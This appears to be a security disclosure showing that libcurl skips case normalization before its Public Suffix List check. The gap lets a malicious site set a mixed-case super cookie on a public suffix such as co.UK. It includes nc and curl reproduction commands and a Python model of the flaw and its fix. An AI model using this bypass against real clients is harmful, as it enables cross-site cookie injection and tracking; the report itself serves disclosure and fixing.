libcurl fails to normalize the hostname and cookie_domain parameters passed to the psl_is_cookie_domain_acceptable function. As a result, a malicious site can set a super cookie if the victim requests a URL whose hostname contains any uppercase characters in the domain part.
The libpsl documentation for psl_is_cookie_domain_acceptable (https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable) says the following:

    Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain.

This is not done correctly, and hence domains with uppercase characters bypass the PSL check. Note that curl itself will later ignore the cookie domain's capitalization and will match even a lowercase hostname against the stored super cookie's mixed-case domain.
It's also worth noting that the request Host header will reveal the mixed case used, which will allow the attacker to prepare the correct Set-Cookie domain for the attack.
Steps to reproduce (testserverip stands for the address of the host running nc):

# 1. Serve a response that sets a cookie scoped to the public suffix co.uk, with mixed case.
echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n\r\n" | nc -v -l -q 1 -p 8888
# 2. Fetch it with a mixed-case hostname and store the cookies in c.txt.
curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888
# 3. Listen for a second request from an unrelated co.uk host ...
nc -v -l -p 7777
# 4. ... and replay the stored cookie jar against it.
curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777
Note that the super cookie is sent to the other.co.uk site. In fact, it will now be sent to any .co.uk host.
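A model of the defect and its fix, as an added example that is not curl's or libpsl's own code: the PSL subset, function names and hostnames are constructed, and str.lower() stands in for psl_str_to_utf8lower().

```python
# Added example, not code from curl or libpsl: a small model of the
# psl_is_cookie_domain_acceptable() check, once without and once with the
# case normalization that libpsl's documentation requires, plus curl's later
# case-insensitive cookie matching. Names and the suffix list are constructed.

# Constructed subset of the Public Suffix List; the real list is far larger.
PUBLIC_SUFFIXES = {"uk", "co.uk", "org.uk", "com", "github.io"}


def _is_subdomain_of(hostname: str, domain: str) -> bool:
    """True if hostname equals domain or sits below it on a label boundary."""
    return hostname == domain or hostname.endswith("." + domain)


def cookie_domain_acceptable_unnormalized(hostname: str, cookie_domain: str) -> bool:
    """Models the defective caller: inputs reach the PSL lookup as received.

    A cookie domain such as 'co.UK' is not found in the lowercase list, so it
    is not recognised as a public suffix and the super cookie is accepted.
    """
    cookie_domain = cookie_domain.lstrip(".")
    if cookie_domain in PUBLIC_SUFFIXES:
        return False  # never allow a cookie scoped to a whole public suffix
    return _is_subdomain_of(hostname, cookie_domain)


def cookie_domain_acceptable(hostname: str, cookie_domain: str) -> bool:
    """Corrected check: lowercase both inputs first, as psl_str_to_utf8lower()
    is meant to. str.lower() stands in for that helper and does not model its
    UTF-8 / IDN handling."""
    hostname = hostname.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    if cookie_domain in PUBLIC_SUFFIXES:
        return False
    return _is_subdomain_of(hostname, cookie_domain)


def cookie_sent_to(stored_domain: str, request_host: str) -> bool:
    """curl's later domain match ignores case, so a cookie stored for '.co.UK'
    is attached to requests for any co.uk host."""
    return _is_subdomain_of(request_host.lower(), stored_domain.lower().lstrip("."))


if __name__ == "__main__":
    host, domain = "test.co.UK", "co.UK"  # the values used in the report
    print(cookie_domain_acceptable_unnormalized(host, domain))  # True: bypass
    print(cookie_domain_acceptable(host, domain))               # False: rejected
    print(cookie_sent_to(".co.UK", "other.co.uk"))              # True
```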
The generated cookie file (fields are tab-separated in the Netscape format):

# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
.co.UK	TRUE	/	FALSE	0	super	oops
Bypassing supercookie protection.